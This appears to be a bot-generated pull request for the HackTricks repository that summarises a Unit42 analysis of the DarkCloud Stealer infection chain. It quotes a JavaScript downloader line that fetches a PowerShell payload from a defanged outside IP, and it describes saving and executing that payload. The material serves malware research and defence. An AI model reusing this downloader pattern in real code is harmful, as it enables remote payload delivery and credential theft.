New Infection Chain and ConfuserEx-Based Obfuscation for Dar...

[carlospolop]

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

• Blog URL: https://unit42.paloaltonetworks.com/new-darkcloud-stealer-infection-chain/
• Blog Title: New Infection Chain and ConfuserEx-Based Obfuscation for DarkCloud Stealer
• Suggested Section: generic-hacking (new section: Obfuscation & Process Injection Techniques)

🎯 Content Summary

Delivery Mechanism and Infection Chain

Three phishing-driven attack chains deliver TAR/RAR archives containing obfuscated JavaScript or 7Z archives with a Windows Script File payload. The JS downloader—protected by javascript-obfuscator—executes:

var xhr = new ActiveXObject('MSXML2.XMLHTTP');
xhr.open('GET','hxxp://176.65.142[.]190/BLACKYY/newbag.ps1',false);
xhr.send();
var fso = new ActiveXObject('Scripting.File...
🔧 Technical Details
Obfuscated JavaScript Downloader:
A JavaScript downloader uses ActiveXObject('MSXML2.XMLHTTP') to fetch a PowerShell script, ActiveXObject('Scripting.FileSystemObject') to save it to C:\Temp with a random 8-character filename, and ActiveXObject('WScript.Shell') to execute it, enabling stealthy retrieval and execution of the next stage.

WSF JScript Downloader:
A .WSF file containing a <job> tag embeds obfuscat...
🤖 Agent Actions
Added DarkCloud Stealer techniques to HackTricks:


src/windows-hardening/av-bypass.md

• Expanded ConfuserEx section with step-by-step deobfuscation workflow (AntiTamperKiller → de4dot-cex → ProxyCall-Remover).

• Added detailed commands, notes and one-liner.

• Restored/updated “## References” including the Unit42 blog URL.


src/reversing/common-api-used-in-malware.md

• Re-wrote “Process Hollowing” into an extensive RunPE section: full API chain, annotated C skeleton, detection notes, campaign insights.

• Appended “## References” with the Unit42 article link.


These updates integrate new obfuscation-bypass and process-injection techniques surfaced in the DarkCloud Stealer research.
✅ Review Checklist

 Content is technically accurate
 Formatting follows HackTricks style guidelines
 Links and references are working
 Content adds educational value
 No sensitive information is exposed


This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.
📚 Repository Maintenance

MD files processed: 865
MD files fixed: 1

All .md files have been checked for proper formatting (headers, includes, etc.).

[carlospolop]

🔗 Additional Context

Original Blog Post: https://unit42.paloaltonetworks.com/new-darkcloud-stealer-infection-chain/

Content Categories: Based on the analysis, this content was categorized under "generic-hacking (new section: Obfuscation & Process Injection Techniques)".

Repository Maintenance:

• MD Files Formatting: 865 files processed (1 files fixed)

Review Notes:

• This content was automatically processed and may require human review for accuracy
• Check that the placement within the repository structure is appropriate
• Verify that all technical details are correct and up-to-date
• All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0